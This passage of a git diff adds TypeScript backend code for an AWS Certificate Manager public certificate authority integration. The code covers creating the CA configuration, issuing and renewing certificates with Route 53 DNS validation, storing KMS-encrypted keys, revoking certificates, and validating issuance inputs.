"./aws-acm-public-ca-certificate-authority-types"; +import { + buildIdempotencyToken, + generateAcmPassphrase, + mapCertKeyAlgorithmToAcm, + validateAcmIssuanceInputs +} from "./aws-acm-public-ca-certificate-authority-validators"; + +const CRL_REASON_TO_ACM_REVOCATION_REASON_MAP: Record = { + [CrlReason.UNSPECIFIED]: RevocationReason.UNSPECIFIED, + [CrlReason.KEY_COMPROMISE]: RevocationReason.KEY_COMPROMISE, + [CrlReason.CA_COMPROMISE]: RevocationReason.CA_COMPROMISE, + [CrlReason.AFFILIATION_CHANGED]: RevocationReason.AFFILIATION_CHANGED, + [CrlReason.SUPERSEDED]: RevocationReason.SUPERSEDED, + [CrlReason.CESSATION_OF_OPERATION]: RevocationReason.CESSATION_OF_OPERATION, + [CrlReason.CERTIFICATE_HOLD]: RevocationReason.CERTIFICATE_HOLD, + [CrlReason.PRIVILEGE_WITHDRAWN]: RevocationReason.PRIVILEGE_WITHDRAWN, + [CrlReason.A_A_COMPROMISE]: RevocationReason.A_A_COMPROMISE +}; + +type TAwsAcmPublicCaCertificateAuthorityFnsDeps = { + appConnectionDAL: Pick; + appConnectionService: Pick; + certificateAuthorityDAL: Pick< + TCertificateAuthorityDALFactory, + "create" | "transaction" | "findByIdWithAssociatedCa" | "updateById" | "findWithAssociatedCa" | "findById" + >; + externalCertificateAuthorityDAL: Pick; + certificateDAL: Pick; + certificateBodyDAL: Pick; + certificateSecretDAL: Pick; + kmsService: Pick< + TKmsServiceFactory, + "encryptWithKmsKey" | "generateKmsKey" | "createCipherPairWithDataKey" | "decryptWithKmsKey" + >; + projectDAL: Pick; + certificateProfileDAL?: Pick; +}; + +export const castDbEntryToAwsAcmPublicCaCertificateAuthority = ( + ca: Awaited> +): TAwsAcmPublicCaCertificateAuthority => { + if (!ca.externalCa?.id) { + throw new BadRequestError({ message: "Malformed AWS ACM Public Certificate Authority" }); + } + + if (!ca.externalCa.appConnectionId) { + throw new BadRequestError({ + message: "AWS app connection ID is missing from certificate authority configuration" + }); + } + + const configuration = ca.externalCa.configuration as { + dnsAppConnectionId?: string; + hostedZoneId?: string; + region: AWSRegion; + }; + + if (!configuration.region || !configuration.dnsAppConnectionId || !configuration.hostedZoneId) { + throw new BadRequestError({ + message: "AWS ACM configuration is incomplete β€” region, Route 53 connection, and hosted zone ID are required" + }); + } + + return { + id: ca.id, + type: CaType.AWS_ACM_PUBLIC_CA, + enableDirectIssuance: ca.enableDirectIssuance, + name: ca.name, + projectId: ca.projectId, + configuration: { + appConnectionId: ca.externalCa.appConnectionId, + dnsAppConnectionId: configuration.dnsAppConnectionId, + hostedZoneId: configuration.hostedZoneId, + region: configuration.region + }, + status: ca.status as CaStatus + }; +}; + +export const AwsAcmPublicCaCertificateAuthorityFns = ({ + appConnectionDAL, + appConnectionService, + certificateAuthorityDAL, + externalCertificateAuthorityDAL, + certificateDAL, + certificateBodyDAL, + certificateSecretDAL, + kmsService, + projectDAL, + certificateProfileDAL +}: TAwsAcmPublicCaCertificateAuthorityFnsDeps) => { + const validateAwsConnection = async ({ + appConnectionId, + dnsAppConnectionId, + projectId, + actor + }: { + appConnectionId: string; + dnsAppConnectionId?: string; + projectId: string; + actor: OrgServiceActor; + }) => { + const appConnection = await appConnectionDAL.findById(appConnectionId); + if (!appConnection) { + throw new NotFoundError({ message: `App connection with ID '${appConnectionId}' not found` }); + } + if (appConnection.app !== AppConnection.AWS) { + throw new BadRequestError({ + message: `App connection with ID '${appConnectionId}' is not an AWS connection` + }); + } + await appConnectionService.validateAppConnectionUsageById( + appConnection.app as AppConnection, + { connectionId: appConnectionId, projectId }, + actor + ); + + if (dnsAppConnectionId && dnsAppConnectionId !== appConnectionId) { + const dnsAppConnection = await appConnectionDAL.findById(dnsAppConnectionId); + if (!dnsAppConnection) { + throw new NotFoundError({ message: `DNS app connection with ID '${dnsAppConnectionId}' not found` }); + } + if (dnsAppConnection.app !== AppConnection.AWS) { + throw new BadRequestError({ + message: `DNS app connection with ID '${dnsAppConnectionId}' is not an AWS connection` + }); + } + await appConnectionService.validateAppConnectionUsageById( + dnsAppConnection.app as AppConnection, + { connectionId: dnsAppConnectionId, projectId }, + actor + ); + } + }; + + const createCertificateAuthority = async ({ + name, + projectId, + configuration, + actor, + status + }: { + status: CaStatus; + name: string; + projectId: string; + configuration: TCreateAwsAcmPublicCaCertificateAuthorityDTO["configuration"]; + actor: OrgServiceActor; + }) => { + const { appConnectionId, dnsAppConnectionId, hostedZoneId, region } = configuration; + + await validateAwsConnection({ appConnectionId, dnsAppConnectionId, projectId, actor }); + + // Smoke-test both connections up front β€” ACM via ListCertificates (no single "get CA" resource), + // and Route 53 via GetHostedZone so a misconfigured DNS connection / wrong zone ID fails + // synchronously here instead of mid-issuance. + const acmClient = await createAcmClient({ appConnectionId, region, appConnectionDAL, kmsService }); + try { + await acmClient.send(new ListCertificatesCommand({ MaxItems: 1 })); + } catch (error) { + throw new BadRequestError({ + message: `Failed to reach AWS Certificate Manager: ${error instanceof Error ? error.message : "Unknown error"}` + }); + } + + const dnsConnection = await resolveDnsAwsConnection({ dnsAppConnectionId, appConnectionDAL, kmsService }); + try { + await route53GetHostedZone(dnsConnection, hostedZoneId); + } catch (error) { + throw new BadRequestError({ + message: `Failed to access Route 53 hosted zone: ${error instanceof Error ? error.message : "Unknown error"}` + }); + } + + const caEntity = await certificateAuthorityDAL.transaction(async (tx) => { + try { + const ca = await certificateAuthorityDAL.create( + { + projectId, + enableDirectIssuance: false, + name, + status + }, + tx + ); + + await externalCertificateAuthorityDAL.create( + { + caId: ca.id, + appConnectionId, + type: CaType.AWS_ACM_PUBLIC_CA, + configuration: { + dnsAppConnectionId, + hostedZoneId, + region + } + }, + tx + ); + + return await certificateAuthorityDAL.findByIdWithAssociatedCa(ca.id, tx); + } catch (error) { + // eslint-disable-next-line @typescript-eslint/no-unsafe-member-access, @typescript-eslint/no-explicit-any + if ((error as any)?.error?.code === "23505") { + throw new BadRequestError({ + message: "Certificate authority with the same name already exists in your project" + }); + } + throw error; + } + }); + + if (!caEntity.externalCa?.id) { + throw new BadRequestError({ message: "Failed to create external certificate authority" }); + } + + return castDbEntryToAwsAcmPublicCaCertificateAuthority(caEntity); + }; + + const updateCertificateAuthority = async ({ + id, + status, + configuration, + actor, + name + }: { + id: string; + status?: CaStatus; + configuration: TUpdateAwsAcmPublicCaCertificateAuthorityDTO["configuration"]; + actor: OrgServiceActor; + name?: string; + }) => { + if (configuration) { + const { appConnectionId, dnsAppConnectionId, hostedZoneId, region } = configuration; + + const ca = await certificateAuthorityDAL.findById(id); + if (!ca) { + throw new NotFoundError({ message: `Could not find Certificate Authority with ID "${id}"` }); + } + + await validateAwsConnection({ appConnectionId, dnsAppConnectionId, projectId: ca.projectId, actor }); + + const acmClient = await createAcmClient({ appConnectionId, region, appConnectionDAL, kmsService }); + try { + await acmClient.send(new ListCertificatesCommand({ MaxItems: 1 })); + } catch (error) { + throw new BadRequestError({ + message: `Failed to reach AWS Certificate Manager: ${error instanceof Error ? error.message : "Unknown error"}` + }); + } + + const dnsConnection = await resolveDnsAwsConnection({ dnsAppConnectionId, appConnectionDAL, kmsService }); + try { + await route53GetHostedZone(dnsConnection, hostedZoneId); + } catch (error) { + throw new BadRequestError({ + message: `Failed to access Route 53 hosted zone: ${error instanceof Error ? error.message : "Unknown error"}` + }); + } + } + + const updatedCa = await certificateAuthorityDAL.transaction(async (tx) => { + if (configuration) { + await externalCertificateAuthorityDAL.update( + { + caId: id, + type: CaType.AWS_ACM_PUBLIC_CA + }, + { + appConnectionId: configuration.appConnectionId, + configuration: { + dnsAppConnectionId: configuration.dnsAppConnectionId, + hostedZoneId: configuration.hostedZoneId, + region: configuration.region + } + }, + tx + ); + } + + if (name || status) { + await certificateAuthorityDAL.updateById( + id, + { + name, + status + }, + tx + ); + } + + return certificateAuthorityDAL.findByIdWithAssociatedCa(id, tx); + }); + + if (!updatedCa.externalCa?.id) { + throw new BadRequestError({ message: "Failed to update external certificate authority" }); + } + + return castDbEntryToAwsAcmPublicCaCertificateAuthority(updatedCa); + }; + + const listCertificateAuthorities = async ({ + projectId, + permissionFilters + }: { + projectId: string; + permissionFilters?: ProcessedPermissionRules; + }) => { + const cas = await certificateAuthorityDAL.findWithAssociatedCa( + { + [`${TableName.CertificateAuthority}.projectId` as "projectId"]: projectId, + [`${TableName.ExternalCertificateAuthority}.type` as "type"]: CaType.AWS_ACM_PUBLIC_CA + }, + {}, + permissionFilters + ); + + return cas.map(castDbEntryToAwsAcmPublicCaCertificateAuthority); + }; + + /** + * Issues (or renews) a certificate from AWS Certificate Manager. + * + * Idempotent via AWS's IdempotencyToken: retrying the same certificateId within + * AWS's 1-hour window returns the same certificate ARN, so we don't need to persist + * intermediate state across retries. The cert record is only created when everything + * completes, in a single DB transaction. If DNS validation is still pending, this + * function throws AcmPendingError and the queue retries. + */ + const orderCertificateFromProfile = async ({ + caId, + profileId, + commonName, + altNames = [], + keyAlgorithm = CertKeyAlgorithm.RSA_2048, + isRenewal, + originalCertificateId, + certificateId, + csr, + validity, + organization, + organizationalUnit, + country, + state, + locality, + keyUsages = [], + extendedKeyUsages = [] + }: { + caId: string; + profileId: string; + commonName: string; + altNames?: Array<{ type: CertSubjectAlternativeNameType; value: string }>; + keyAlgorithm?: CertKeyAlgorithm; + isRenewal?: boolean; + originalCertificateId?: string; + certificateId: string; + csr?: string; + validity?: { ttl?: string }; + organization?: string; + organizationalUnit?: string; + country?: string; + state?: string; + locality?: string; + keyUsages?: string[]; + extendedKeyUsages?: string[]; + }) => { + validateAcmIssuanceInputs({ + csr, + keyAlgorithm, + altNames, + ttl: validity?.ttl, + organization, + organizationalUnit, + country, + state, + locality, + isRenewal + }); + + if (keyUsages.length > 0 || extendedKeyUsages.length > 0) { + logger.info( + `[caId=${caId}] AWS ACM overrides caller-specified key usages and extended key usages with its own current policy.` + ); + } + + const ca = await certificateAuthorityDAL.findByIdWithAssociatedCa(caId); + if (!ca.externalCa || ca.externalCa.type !== CaType.AWS_ACM_PUBLIC_CA) { + throw new BadRequestError({ message: "CA is not an AWS ACM Public Certificate Authority" }); + } + + const acmCa = castDbEntryToAwsAcmPublicCaCertificateAuthority(ca); + if (acmCa.status !== CaStatus.ACTIVE) { + throw new BadRequestError({ message: "CA is disabled" }); + } + + const { appConnectionId, dnsAppConnectionId, hostedZoneId, region } = acmCa.configuration; + + // ACM ARNs are region-locked. On renewal this gets overwritten with the original + // cert's region so the stored metadata stays consistent with the ARN even if the + // CA's configured region was edited between issuance and renewal. + let issuanceRegion: AWSRegion = region; + + const certificateManagerKmsId = await getProjectKmsCertificateKeyId({ + projectId: ca.projectId, + projectDAL, + kmsService + }); + + const kmsEncryptor = await kmsService.encryptWithKmsKey({ kmsId: certificateManagerKmsId }); + let certificateArn: string; + let acmClient: ACMClient; + + if (isRenewal && originalCertificateId) { + const originalCert = await certificateDAL.findById(originalCertificateId); + if (!originalCert) { + throw new BadRequestError({ message: `Original certificate ${originalCertificateId} not found` }); + } + const parsedMetadata = ExternalMetadataSchema.safeParse(originalCert.externalMetadata); + if ( + !parsedMetadata.success || + parsedMetadata.data.type !== CaType.AWS_ACM_PUBLIC_CA || + !parsedMetadata.data.arn + ) { + throw new BadRequestError({ + message: "Original certificate is missing AWS ACM metadata β€” cannot renew" + }); + } + certificateArn = parsedMetadata.data.arn; + issuanceRegion = parsedMetadata.data.region; + + acmClient = await createAcmClient({ + appConnectionId, + region: issuanceRegion, + appConnectionDAL, + kmsService + }); + + const describe = await acmClient.send(new DescribeCertificateCommand({ CertificateArn: certificateArn })); + const detail = describe.Certificate; + if (!detail) { + throw new BadRequestError({ message: `ACM did not return details for certificate ${certificateArn}` }); + } + // ACM serials may come back colon-separated hex (e.g., "0a:1b:..."), our DB stores plain hex β€” + // normalize both before comparing. + const normalizeSerial = (s?: string | null) => s?.split(":").join("").toLowerCase() ?? ""; + const storedSerial = normalizeSerial(originalCert.serialNumber); + const awsSerial = normalizeSerial(detail.Serial); + const alreadyRenewedByAws = Boolean(awsSerial && storedSerial && awsSerial !== storedSerial); + + if (!alreadyRenewedByAws) { + if (detail.DomainValidationOptions) { + const dnsConnection = await resolveDnsAwsConnection({ + dnsAppConnectionId, + appConnectionDAL, + kmsService + }); + for (const dv of detail.DomainValidationOptions) { + if (dv.ResourceRecord?.Name && dv.ResourceRecord?.Value) { + await route53UpsertRecord(dnsConnection, hostedZoneId, { + name: dv.ResourceRecord.Name, + type: "CNAME", + value: dv.ResourceRecord.Value + }); + } + } + } + + const renewalInProgress = detail.RenewalSummary?.RenewalStatus === "PENDING_VALIDATION"; + if (!renewalInProgress) { + await acmClient.send(new RenewCertificateCommand({ CertificateArn: certificateArn })); + } + + const afterRenew = await acmClient.send(new DescribeCertificateCommand({ CertificateArn: certificateArn })); + const renewStatus = afterRenew.Certificate?.RenewalSummary?.RenewalStatus; + if (renewStatus === "FAILED") { + throw new AcmTerminalError(`AWS ACM renewal failed for ${certificateArn}`); + } + // ExportCertificate keeps returning the original cert until ACM has fully re-issued the + // renewed one. Serial number changing is the ground-truth signal that a new cert body + // exists; NotAfter and RenewalStatus can lag or be misleading. + const newSerial = normalizeSerial(afterRenew.Certificate?.Serial); + const renewalComplete = Boolean(newSerial && storedSerial && newSerial !== storedSerial); + if (!renewalComplete) { + throw new AcmPendingError( + `AWS ACM renewal for ${certificateArn} has not completed yet (status=${renewStatus ?? "unknown"}) β€” will retry` + ); + } + } + } else { + // New issuance β€” use the CA's configured region. + acmClient = await createAcmClient({ appConnectionId, region, appConnectionDAL, kmsService }); + + const domainName = commonName || (altNames.length > 0 ? altNames[0].value : ""); + if (!domainName) { + throw new BadRequestError({ message: "AWS ACM requires a DomainName (common name or first SAN)" }); + } + const subjectAlternativeNames = altNames.map((s) => s.value); + + const idempotencyToken = buildIdempotencyToken(certificateId); + + const requestResult = await acmClient.send( + new RequestCertificateCommand({ + DomainName: domainName, + SubjectAlternativeNames: subjectAlternativeNames.length > 0 ? subjectAlternativeNames : undefined, + KeyAlgorithm: mapCertKeyAlgorithmToAcm(keyAlgorithm), + ValidationMethod: ValidationMethod.DNS, + IdempotencyToken: idempotencyToken, + Options: { Export: CertificateExport.ENABLED } + }) + ); + + if (!requestResult.CertificateArn) { + throw new BadRequestError({ message: "AWS ACM did not return a certificate ARN" }); + } + certificateArn = requestResult.CertificateArn; + + const describe = await acmClient.send(new DescribeCertificateCommand({ CertificateArn: certificateArn })); + const detail = describe.Certificate; + if (!detail) { + throw new BadRequestError({ message: `ACM did not return details for certificate ${certificateArn}` }); + } + + if (detail.DomainValidationOptions) { + const dnsConnection = await resolveDnsAwsConnection({ + dnsAppConnectionId, + appConnectionDAL, + kmsService + }); + for (const dv of detail.DomainValidationOptions) { + if (dv.ResourceRecord?.Name && dv.ResourceRecord?.Value) { + await route53UpsertRecord(dnsConnection, hostedZoneId, { + name: dv.ResourceRecord.Name, + type: "CNAME", + value: dv.ResourceRecord.Value + }); + } + } + } + + if (detail.Status === CertificateStatus.PENDING_VALIDATION) { + throw new AcmPendingError(`AWS ACM certificate ${certificateArn} is still pending DNS validation β€” will retry`); + } + if ( + detail.Status === CertificateStatus.FAILED || + detail.Status === CertificateStatus.VALIDATION_TIMED_OUT || + detail.Status === CertificateStatus.REVOKED || + detail.Status === CertificateStatus.EXPIRED + ) { + throw new AcmTerminalError(`AWS ACM certificate ${certificateArn} is in terminal status: ${detail.Status}`); + } + } + + const passphrase = generateAcmPassphrase(); + let exportResult; + try { + exportResult = await acmClient.send( + new ExportCertificateCommand({ + CertificateArn: certificateArn, + Passphrase: Buffer.from(passphrase, "utf8") + }) + ); + } catch (error) { + // Right after RenewCertificate succeeds, ACM sometimes hasn't fully established the export + // relation for the renewed cert body yet and returns "must have at least one relation of type + // EXPORT". This is transient β€” let the queue retry loop handle it. + if (error instanceof Error && new RE2("relation of type EXPORT", "i").test(error.message)) { + throw new AcmPendingError( + `AWS ACM export not yet available for ${certificateArn} (${error.message}) β€” will retry` + ); + } + throw error; + } + + if (!exportResult.Certificate || !exportResult.PrivateKey) { + throw new BadRequestError({ + message: `AWS ACM ExportCertificate did not return certificate body or private key for ${certificateArn}` + }); + } + + const certificatePem = exportResult.Certificate; + const certificateChainPem = exportResult.CertificateChain || ""; + const encryptedPrivateKeyPem = exportResult.PrivateKey; + + // Decrypt AWS's encrypted private key with the ephemeral passphrase, then re-serialize as plain PKCS8. + const privateKeyObj = crypto.nativeCrypto.createPrivateKey({ + key: encryptedPrivateKeyPem, + format: "pem", + passphrase + }); + const privateKeyPem = privateKeyObj.export({ format: "pem", type: "pkcs8" }) as string; + + let certObj: x509.X509Certificate; + try { + certObj = new x509.X509Certificate(certificatePem); + } catch (error) { + throw new BadRequestError({ + message: `Failed to parse certificate from AWS ACM: ${error instanceof Error ? error.message : "Unknown error"}` + }); + } + + const { cipherTextBlob: encryptedCertificate } = await kmsEncryptor({ + plainText: Buffer.from(new Uint8Array(certObj.rawData)) + }); + + const { cipherTextBlob: encryptedCertificateChain } = await kmsEncryptor({ + plainText: Buffer.from(certificateChainPem) + }); + + const { cipherTextBlob: encryptedPrivateKey } = await kmsEncryptor({ + plainText: Buffer.from(privateKeyPem) + }); + + const parsedFields = extractCertificateFields(Buffer.from(certificatePem)); + + // Extract key usages and extended key usages from the certificate ACM actually issued β€” + // ACM applies its own policy and revises it over time, so the request is not the source of truth. + let issuedKeyUsages: CertKeyUsage[] = []; + const keyUsagesExt = certObj.getExtension(x509.KeyUsagesExtension); + if (keyUsagesExt) { + issuedKeyUsages = Object.values(CertKeyUsage).filter( + // eslint-disable-next-line no-bitwise + (usage) => (x509.KeyUsageFlags[usage] & keyUsagesExt.usages) !== 0 + ); + } + + let issuedExtendedKeyUsages: CertExtendedKeyUsage[] = []; + const extKeyUsageExt = certObj.getExtension(x509.ExtendedKeyUsageExtension); + if (extKeyUsageExt) { + issuedExtendedKeyUsages = extKeyUsageExt.usages + .map((oid) => CertExtendedKeyUsageOIDToName[oid as string]) + .filter(Boolean); + } + + // ACM picks the signature algorithm server-side β€” derive it from the issued cert + // so the persisted value matches what was actually signed. + const sigAlgName = certObj.signatureAlgorithm.name; + const sigHashName = (certObj.signatureAlgorithm as unknown as { hash?: { name: string } }).hash?.name; + let issuedSignatureAlgorithm: CertSignatureAlgorithm; + if (sigAlgName === "RSASSA-PKCS1-v1_5" && sigHashName === "SHA-256") { + issuedSignatureAlgorithm = CertSignatureAlgorithm.RSA_SHA256; + } else if (sigAlgName === "RSASSA-PKCS1-v1_5" && sigHashName === "SHA-384") { + issuedSignatureAlgorithm = CertSignatureAlgorithm.RSA_SHA384; + } else if (sigAlgName === "RSASSA-PKCS1-v1_5" && sigHashName === "SHA-512") { + issuedSignatureAlgorithm = CertSignatureAlgorithm.RSA_SHA512; + } else if (sigAlgName === "ECDSA" && sigHashName === "SHA-256") { + issuedSignatureAlgorithm = CertSignatureAlgorithm.ECDSA_SHA256; + } else if (sigAlgName === "ECDSA" && sigHashName === "SHA-384") { + issuedSignatureAlgorithm = CertSignatureAlgorithm.ECDSA_SHA384; + } else if (sigAlgName === "ECDSA" && sigHashName === "SHA-512") { + issuedSignatureAlgorithm = CertSignatureAlgorithm.ECDSA_SHA512; + } else { + throw new BadRequestError({ + message: `Unsupported signature algorithm from AWS ACM: ${sigAlgName} with ${sigHashName}` + }); + } + + const externalMetadata = ExternalMetadataSchema.parse({ + type: CaType.AWS_ACM_PUBLIC_CA, + arn: certificateArn, + region: issuanceRegion, + validationMethod: AwsAcmValidationMethod.DNS + }); + + let newCertId: string; + await certificateDAL.transaction(async (tx) => { + const cert = await certificateDAL.create( + { + caId: ca.id, + profileId, + status: CertStatus.ACTIVE, + friendlyName: commonName, + commonName, + altNames: altNames.map((san) => san.value).join(","), + serialNumber: certObj.serialNumber, + notBefore: certObj.notBefore, + notAfter: certObj.notAfter, + keyAlgorithm, + signatureAlgorithm: issuedSignatureAlgorithm, + keyUsages: issuedKeyUsages, + extendedKeyUsages: issuedExtendedKeyUsages, + projectId: ca.projectId, + externalMetadata, + renewedFromCertificateId: isRenewal && originalCertificateId ? originalCertificateId : null, + ...parsedFields + }, + tx + ); + + newCertId = cert.id; + + if (isRenewal && originalCertificateId) { + await certificateDAL.updateById(originalCertificateId, { renewedByCertificateId: cert.id }, tx); + } + + await certificateBodyDAL.create( + { + certId: cert.id, + encryptedCertificate, + encryptedCertificateChain + }, + tx + ); + + await certificateSecretDAL.create( + { + certId: cert.id, + encryptedPrivateKey + }, + tx + ); + + if (profileId && certificateProfileDAL) { + const profile = await certificateProfileDAL.findByIdWithConfigs(profileId, tx); + if (profile?.apiConfig?.autoRenew && profile.apiConfig.renewBeforeDays) { + await certificateDAL.updateById(cert.id, { renewBeforeDays: profile.apiConfig.renewBeforeDays }, tx); + } + } + }); + + return { + certificate: certificatePem, + certificateChain: certificateChainPem, + privateKey: privateKeyPem, + serialNumber: certObj.serialNumber, + certificateId: newCertId!, + ca: acmCa + }; + }; + + const revokeCertificate = async ({ + caId, + serialNumber, + reason + }: { + caId: string; + serialNumber: string; + reason: CrlReason; + }) => { + const ca = await certificateAuthorityDAL.findByIdWithAssociatedCa(caId); + if (!ca.externalCa || ca.externalCa.type !== CaType.AWS_ACM_PUBLIC_CA) { + throw new BadRequestError({ message: "CA is not an AWS ACM Public Certificate Authority" }); + } + + const acmCa = castDbEntryToAwsAcmPublicCaCertificateAuthority(ca); + const { appConnectionId } = acmCa.configuration; + + // ACM revokes by ARN, not serial number. Look up the ARN from the cert's externalMetadata. + const cert = await certificateDAL.findOne({ caId, serialNumber }); + if (!cert) { + throw new NotFoundError({ + message: `Certificate with serial number '${serialNumber}' not found under CA '${caId}'` + }); + } + + // If this certificate has been superseded by a renewal, the ARN now points at the renewed + // cert body in AWS β€” hitting AWS RevokeCertificate would revoke the actively-served cert. + // The superseded cert body is already gone from AWS, so skip the AWS call and let the caller + // mark the DB row as REVOKED on its own. + if (cert.renewedByCertificateId) { + logger.info( + `Skipping AWS ACM revoke for superseded certificate β€” ARN now points at renewed cert [certificateId=${cert.id}] [renewedByCertificateId=${cert.renewedByCertificateId}]` + ); + return; + } + + const parsedMetadata = ExternalMetadataSchema.safeParse(cert.externalMetadata); + if (!parsedMetadata.success || parsedMetadata.data.type !== CaType.AWS_ACM_PUBLIC_CA || !parsedMetadata.data.arn) { + throw new BadRequestError({ + message: `Certificate '${cert.id}' is missing AWS ACM metadata β€” cannot resolve ARN for revocation` + }); + } + + // ARNs are region-locked β€” use the cert's stored region, not the CA's current region. + const acmClient = await createAcmClient({ + appConnectionId, + region: parsedMetadata.data.region, + appConnectionDAL, + kmsService + }); + const revocationReason = CRL_REASON_TO_ACM_REVOCATION_REASON_MAP[reason]; + + let result; + try { + result = await acmClient.send( + new RevokeCertificateCommand({ + CertificateArn: parsedMetadata.data.arn, + RevocationReason: revocationReason + }) + ); + } catch (error) { + throw new BadRequestError({ + message: `Failed to revoke certificate via AWS Certificate Manager: ${error instanceof Error ? error.message : "Unknown error"}` + }); + } + logger.info(result, "AWS ACM RevokeCertificate result"); + }; + + return { + createCertificateAuthority, + updateCertificateAuthority, + listCertificateAuthorities, + orderCertificateFromProfile, + revokeCertificate + }; +}; + +// Re-export for existing callers (queue, v3 service, approval fns, etc.). +export { validateAcmIssuanceInputs }; diff --git a/backend/src/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-schemas.ts b/backend/src/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-schemas.ts new file mode 100644 index 00000000000..ebbb100c58c --- /dev/null +++ b/backend/src/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-schemas.ts @@ -0,0 +1,47 @@ +import { z } from "zod"; + +import { CertificateAuthorities } from "@app/lib/api-docs/constants"; +import { AWSRegion } from "@app/services/app-connection/app-connection-enums"; + +import { CaType } from "../certificate-authority-enums"; +import { + BaseCertificateAuthoritySchema, + GenericCreateCertificateAuthorityFieldsSchema, + GenericUpdateCertificateAuthorityFieldsSchema +} from "../certificate-authority-schemas"; + +export const AwsAcmPublicCaCertificateAuthorityConfigurationSchema = z.object({ + appConnectionId: z + .string() + .uuid() + .trim() + .describe(CertificateAuthorities.CONFIGURATIONS.AWS_ACM_PUBLIC_CA.appConnectionId), + dnsAppConnectionId: z + .string() + .uuid() + .trim() + .describe(CertificateAuthorities.CONFIGURATIONS.AWS_ACM_PUBLIC_CA.dnsAppConnectionId), + hostedZoneId: z + .string() + .trim() + .min(1, "Hosted Zone ID is required") + .describe(CertificateAuthorities.CONFIGURATIONS.AWS_ACM_PUBLIC_CA.hostedZoneId), + region: z.nativeEnum(AWSRegion).describe(CertificateAuthorities.CONFIGURATIONS.AWS_ACM_PUBLIC_CA.region) +}); + +export const AwsAcmPublicCaCertificateAuthoritySchema = BaseCertificateAuthoritySchema.extend({ + type: z.literal(CaType.AWS_ACM_PUBLIC_CA), + configuration: AwsAcmPublicCaCertificateAuthorityConfigurationSchema +}); + +export const CreateAwsAcmPublicCaCertificateAuthoritySchema = GenericCreateCertificateAuthorityFieldsSchema( + CaType.AWS_ACM_PUBLIC_CA +).extend({ + configuration: AwsAcmPublicCaCertificateAuthorityConfigurationSchema +}); + +export const UpdateAwsAcmPublicCaCertificateAuthoritySchema = GenericUpdateCertificateAuthorityFieldsSchema( + CaType.AWS_ACM_PUBLIC_CA +).extend({ + configuration: AwsAcmPublicCaCertificateAuthorityConfigurationSchema.optional() +}); diff --git a/backend/src/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-types.ts b/backend/src/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-types.ts new file mode 100644 index 00000000000..680d46e4b8a --- /dev/null +++ b/backend/src/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-types.ts @@ -0,0 +1,17 @@ +import { z } from "zod"; + +import { + AwsAcmPublicCaCertificateAuthoritySchema, + CreateAwsAcmPublicCaCertificateAuthoritySchema, + UpdateAwsAcmPublicCaCertificateAuthoritySchema +} from "./aws-acm-public-ca-certificate-authority-schemas"; + +export type TAwsAcmPublicCaCertificateAuthority = z.infer; + +export type TCreateAwsAcmPublicCaCertificateAuthorityDTO = z.infer< + typeof CreateAwsAcmPublicCaCertificateAuthoritySchema +>; + +export type TUpdateAwsAcmPublicCaCertificateAuthorityDTO = z.infer< + typeof UpdateAwsAcmPublicCaCertificateAuthoritySchema +>; diff --git a/backend/src/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-validators.ts b/backend/src/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-validators.ts new file mode 100644 index 00000000000..778202026e4 --- /dev/null +++ b/backend/src/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-validators.ts @@ -0,0 +1,128 @@ +import { customAlphabet } from "nanoid"; + +import { BadRequestError } from "@app/lib/errors"; +import { ms } from "@app/lib/ms"; +import { CertKeyAlgorithm, CertSubjectAlternativeNameType } from "@app/services/certificate/certificate-types"; + +import { AWS_ACM_CERTIFICATE_VALIDITY_DAYS } from "./aws-acm-public-ca-certificate-authority-enums"; + +export const ACM_ALLOWED_KEY_ALGORITHMS = new Set([ + CertKeyAlgorithm.RSA_2048, + CertKeyAlgorithm.ECDSA_P256, + CertKeyAlgorithm.ECDSA_P384 +]); + +export const ACM_FIXED_VALIDITY_MS = AWS_ACM_CERTIFICATE_VALIDITY_DAYS * 24 * 60 * 60 * 1000; + +/** + * Pre-flight validator for ACM issuance inputs. Called both by the async fns + * (defense in depth) and synchronously by the certificate order API before + * enqueuing, so the user gets a 400 on submit rather than a FAILED request + * row a moment later. + */ +export const validateAcmIssuanceInputs = ({ + csr, + keyAlgorithm, + altNames, + ttl, + notBefore, + notAfter, + organization, + organizationalUnit, + country, + state, + locality, + isRenewal +}: { + csr?: string; + keyAlgorithm?: string; + altNames?: Array<{ type: CertSubjectAlternativeNameType; value: string }>; + ttl?: string; + notBefore?: Date | string; + notAfter?: Date | string; + organization?: string; + organizationalUnit?: string; + country?: string; + state?: string; + locality?: string; + isRenewal?: boolean; +}) => { + if (csr) { + throw new BadRequestError({ + message: "AWS Certificate Manager does not support CSR-based issuance" + }); + } + if (keyAlgorithm && !ACM_ALLOWED_KEY_ALGORITHMS.has(keyAlgorithm)) { + throw new BadRequestError({ + message: `AWS ACM only supports RSA_2048, EC_prime256v1, and EC_secp384r1 key algorithms. Received: ${keyAlgorithm}` + }); + } + if (organization || organizationalUnit || country || state || locality) { + throw new BadRequestError({ + message: "AWS Certificate Manager does not support subject fields (O, OU, C, ST, L)" + }); + } + if (altNames) { + for (const san of altNames) { + if (san.type !== CertSubjectAlternativeNameType.DNS_NAME) { + throw new BadRequestError({ + message: `AWS Certificate Manager only supports DNS SANs. Unsupported SAN type: ${san.type}` + }); + } + } + } + // On renewal, ACM handles validity itself β€” we don't pass a TTL to AWS, and the + // TTL derived from the original cert may round down (e.g., 197.999d β†’ "197d"), + // so skip the exact-match check. + if (!isRenewal) { + if (!ttl) { + throw new BadRequestError({ + message: `AWS Certificate Manager issues certificates with a fixed validity of ${AWS_ACM_CERTIFICATE_VALIDITY_DAYS} days.` + }); + } + let ttlMs: number; + try { + ttlMs = ms(ttl); + } catch { + throw new BadRequestError({ + message: `Invalid TTL format: ${ttl}` + }); + } + if (ttlMs !== ACM_FIXED_VALIDITY_MS) { + throw new BadRequestError({ + message: `AWS Certificate Manager issues certificates with a fixed validity of ${AWS_ACM_CERTIFICATE_VALIDITY_DAYS} days.` + }); + } + if (notBefore || notAfter) { + throw new BadRequestError({ + message: `AWS Certificate Manager does not support notBefore or 